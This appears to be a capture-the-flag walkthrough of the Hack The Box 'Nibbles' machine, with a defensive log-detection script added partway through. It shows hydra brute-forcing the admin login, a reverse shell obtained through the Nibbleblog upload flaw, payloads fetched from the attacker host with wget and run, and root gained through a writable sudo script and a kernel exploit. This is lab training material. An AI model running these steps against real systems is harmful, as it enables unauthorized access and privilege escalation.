/nibbleblog

1. SCANNING

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

┌──(root💀takudaddy)-[/htb]
└─# gobuster dir -f -t 50 -x html,txt,php -u http://10.10.10.75/nibbleblog -w /usr/share/wordlists/dirb/small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.75/nibbleblog
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,php
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2021/04/19 17:49:53 Starting gobuster in directory enumeration mode
===============================================================

/admin/               (Status: 200) [Size: 2127]
/admin.php            (Status: 200) [Size: 1401]
/content/             (Status: 200) [Size: 1353]
/install.php          (Status: 200) [Size: 78]  
/index.php            (Status: 200) [Size: 2986]
/sitemap.php          (Status: 200) [Size: 401] 
/update.php           (Status: 200) [Size: 1622]
                                                
===============================================================
2021/04/19 17:50:13 Finished

nibbleblog 4.0.3

┌──(root💀takudaddy)-[~]
└─# searchsploit nibbleblog              
-------------------------------------------------- ---------------------------------
 Exploit Title                                    |  Path
-------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections            | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metaspl | php/remote/38489.rb
-------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                    
┌──(root💀takudaddy)-[~]
└─# cd /htb/n      
                                                                                    
┌──(root💀takudaddy)-[/htb/n]
└─# searchsploit -m php/remote/38489.rb  
  Exploit: Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)
      URL: https://www.exploit-db.com/exploits/38489
     Path: /usr/share/exploitdb/exploits/php/remote/38489.rb
File Type: Ruby script, ASCII text, with CRLF line terminators

Copied to: /htb/n/38489.rb

sqlmap = didn't work

diego najar

Image upload possible? Not possible.

username = admin

hydra :

First, use cewl to build a password list from the words on the page.

┌──(root💀takudaddy)-[~]
└─# cewl -m 5 http://10.10.10.75/nibbles > pass.list  

┌──(root💀takudaddy)-[/htb/n]
└─# cat pass.list
Found
requested
nibbles
found
server
Apache
Ubuntu
Server


┌──(root💀takudaddy)-[/htb/n]
└─# hydra -l admin -P pass.list 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^,password=^PASS^:Incorrect username" -t 3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-19 20:58:08
[DATA] max 3 tasks per 1 server, overall 3 tasks, 8 login tries (l:1/p:8), ~3 tries per task
[DATA] attacking http-post-form://10.10.10.75:80/nibbleblog/admin.php:username=^USER^,password=^PASS^:Incorrect username
[80][http-post-form] host: 10.10.10.75   login: admin   password: nibbles
[80][http-post-form] host: 10.10.10.75   login: admin   password: Found
[80][http-post-form] host: 10.10.10.75   login: admin   password: requested
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-19 20:58:09

After 5 or more wrong passwords, the page locks for about 5 minutes.

admin : nibbles
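A defender-side counterpart to the hydra run above, added here and not part of the original write-up: it scans Apache access-log lines for the burst pattern (five or more POSTs to admin.php from one client within a single minute, the same count that trips the Nibbleblog lockout). The log lines are constructed and the function name is mine.

```shell
#!/bin/sh
# Added detection example (not from the original write-up): find password-guessing
# bursts against the Nibbleblog admin login in Apache combined-format access logs.
# The sample log below is constructed; real logs would be fed in with cat or tail -f.
SAMPLE_LOG='10.10.14.13 - - [19/Apr/2021:20:58:07 -0400] "GET /nibbleblog/admin.php HTTP/1.1" 200 1401 "-" "-"
10.10.14.13 - - [19/Apr/2021:20:58:08 -0400] "POST /nibbleblog/admin.php HTTP/1.1" 200 1401 "-" "-"
10.10.14.13 - - [19/Apr/2021:20:58:08 -0400] "POST /nibbleblog/admin.php HTTP/1.1" 200 1401 "-" "-"
10.10.14.13 - - [19/Apr/2021:20:58:08 -0400] "POST /nibbleblog/admin.php HTTP/1.1" 200 1401 "-" "-"
10.10.14.13 - - [19/Apr/2021:20:58:09 -0400] "POST /nibbleblog/admin.php HTTP/1.1" 200 1401 "-" "-"
10.10.14.13 - - [19/Apr/2021:20:58:09 -0400] "POST /nibbleblog/admin.php HTTP/1.1" 200 1401 "-" "-"
10.10.14.13 - - [19/Apr/2021:20:58:09 -0400] "POST /nibbleblog/admin.php HTTP/1.1" 302 0 "-" "-"
10.10.14.13 - - [19/Apr/2021:20:59:30 -0400] "POST /nibbleblog/admin.php HTTP/1.1" 200 1401 "-" "-"
10.10.14.99 - - [19/Apr/2021:20:58:30 -0400] "POST /nibbleblog/admin.php HTTP/1.1" 200 1401 "-" "-"'

# Read log lines on stdin and print "ip day:hour:minute count" for every client
# that POSTed to the admin login at least THRESHOLD times inside one minute.
# Only POSTs count: GETs of admin.php are ordinary page loads.
flag_login_bursts() {
    threshold="${1:-5}"
    awk -v th="$threshold" '
        $6 == "\"POST" && $7 ~ /^\/nibbleblog\/admin\.php/ {
            # $4 looks like [19/Apr/2021:20:58:08 ; chars 2..18 are day..minute
            minute = substr($4, 2, 17)
            n[$1 " " minute]++
        }
        END { for (k in n) if (n[k] >= th) print k, n[k] }' | sort
}

# Run against the constructed sample:  ./login_bursts.sh --demo
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_LOG" | flag_login_bursts 5
fi
```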

2. EXPLOITATION

How to exploit the Nibbleblog 4.0.3 upload vulnerability

https://wikihak.com/how-to-upload-a-shell-in-nibbleblog-4-0-3/

Go into My image, upload the reverse shell, then browse to the path and the file is there.

Start the listener, then click the file:

┌──(root💀takudaddy)-[~]
└─# nc -lvnp 7979
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.75] 53278
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 08:19:12 up 58 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ id ; hostname ; ifconfig ; date
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
Nibbles
ens192    Link encap:Ethernet  HWaddr 00:50:56:b9:5e:5f  
          inet addr:10.10.10.75  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:5e5f/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:5e5f/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:16878 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15661 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2244971 (2.2 MB)  TX bytes:2846348 (2.8 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:200 errors:0 dropped:0 overruns:0 frame:0
          TX packets:200 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:15800 (15.8 KB)  TX bytes:15800 (15.8 KB)

Mon Apr 19 08:19:37 EDT 2021
$ 

Foothold obtained.

3. POST EXPLOITATION

$ python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 2: python: not found
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
nibbler@Nibbles:/$ 

nibbler@Nibbles:/$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/$ cd /home
cd /home
nibbler@Nibbles:/home$ ls -al
ls -al
total 12
drwxr-xr-x  3 root    root    4096 Dec 10  2017 .
drwxr-xr-x 23 root    root    4096 Dec 15 05:13 ..
drwxr-xr-x  3 nibbler nibbler 4096 Dec 29  2017 nibbler
nibbler@Nibbles:/home$ cd nibbler
cd nibbler
nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip  user.txt
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
91f39f173c2a12ca09947b7d9a51edac


nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh  
nibbler@Nibbles:/home/nibbler$ ls
ls
personal  personal.zip  user.txt
nibbler@Nibbles:/home/nibbler$ cd personal
cd personal
nibbler@Nibbles:/home/nibbler/personal$ ls -al
ls -al
total 12
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 4 nibbler nibbler 4096 Apr 19 08:21 ..
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 stuff
nibbler@Nibbles:/home/nibbler/personal$ cd stuff
cd stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -al
ls -al
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh

4. PRIVILEGE ESCALATION

nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "bash" > monitor.sh
echo "bash" > monitor.sh

nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo ./monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# 

root@Nibbles:/home/nibbler/personal/stuff# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:/home/nibbler/personal/stuff# cd /root
cd /root
root@Nibbles:~# ls
ls
root.txt
root@Nibbles:~# cat root.txt
cat root.txt
49c81b66d5aa765f149e175a3eff4995
root@Nibbles:~# 

Above I unzipped personal.zip and used it, but simply creating the directory and the file yourself works just as well.

nibbler@Nibbles:/home/nibbler$ mkdir -p personal/stuff/
mkdir -p personal/stuff/
nibbler@Nibbles:/home/nibbler$ cd personal/stuff
cd personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
ls
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "bash" > monitor.sh
echo "bash" > monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -al
ls -al
total 12
drwxrwxrwx 2 nibbler nibbler 4096 Apr 19 08:50 .
drwxrwxrwx 3 nibbler nibbler 4096 Apr 19 08:49 ..
-rw-rw-rw- 1 nibbler nibbler    5 Apr 19 08:50 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x *.sh
chmod +x *.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo ./monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# id ; whoami ; hostname
id ; whoami ; hostname
uid=0(root) gid=0(root) groups=0(root)
root
Nibbles

Simple method:

nibbler@Nibbles:/home/nibbler/personal/stuff$ wget http://10.10.14.13/LES.sh
wget http://10.10.14.13/LES.sh
--2021-04-19 08:25:59--  http://10.10.14.13/LES.sh
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 87559 (86K) [text/x-sh]
Saving to: 'LES.sh'

LES.sh              100%[===================>]  85.51K   209KB/s    in 0.4s    

2021-04-19 08:25:59 (209 KB/s) - 'LES.sh' saved [87559/87559]

nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
ls
LES.sh  monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x *.sh
chmod +x *.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ 

nibbler@Nibbles:/home/nibbler/personal/stuff$ ./LES.sh
./LES.sh

Available information:

Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

76 kernel space exploits
48 user space exploits

Possible Exploits:
[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

..........

nibbler@Nibbles:/home/nibbler/personal/stuff$ wget http://10.10.14.13/45010
wget http://10.10.14.13/45010
--2021-04-19 08:26:59--  http://10.10.14.13/45010
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22264 (22K)
Saving to: '45010'

45010               100%[===================>]  21.74K   108KB/s    in 0.2s    

2021-04-19 08:27:00 (108 KB/s) - '45010' saved [22264/22264]

nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x 54010
chmod +x 54010
chmod: cannot access '54010': No such file or directory
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x 45010
chmod +x 45010
nibbler@Nibbles:/home/nibbler/personal/stuff$ ./45010
./45010
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880033bf0900
[*] Leaking sock struct from ffff88003259a400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880039fc6d80
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff880039fc6d80
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),1001(nibbler)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
49c81b66d5aa765f149e175a3eff4995
# 
